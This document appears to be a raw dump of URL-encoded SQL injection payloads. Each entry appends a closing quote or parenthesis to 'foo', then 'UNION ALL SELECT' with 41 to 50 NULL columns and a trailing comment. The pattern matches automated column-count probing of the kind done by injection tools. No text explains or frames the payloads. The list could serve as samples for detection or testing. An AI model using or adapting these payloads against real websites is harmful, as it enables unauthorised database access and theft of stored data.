foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 